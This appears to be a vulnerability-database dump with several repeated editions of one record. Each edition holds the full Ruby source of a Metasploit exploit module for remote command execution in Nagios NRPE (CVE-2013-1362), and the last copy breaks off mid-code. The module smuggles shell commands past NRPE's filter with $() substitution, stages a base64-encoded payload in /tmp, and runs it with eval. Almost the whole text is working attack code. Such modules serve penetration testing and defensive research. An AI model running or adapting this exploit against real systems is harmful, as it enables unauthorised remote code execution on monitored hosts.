Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T06:13:17", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T20:14:23", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T20:14:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T20:14:23", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T22:14:58", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T22:14:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T22:14:58", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-06T20:15:10", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-06T20:15:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-06T20:15:10", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-06T22:15:15", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-06T22:15:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n 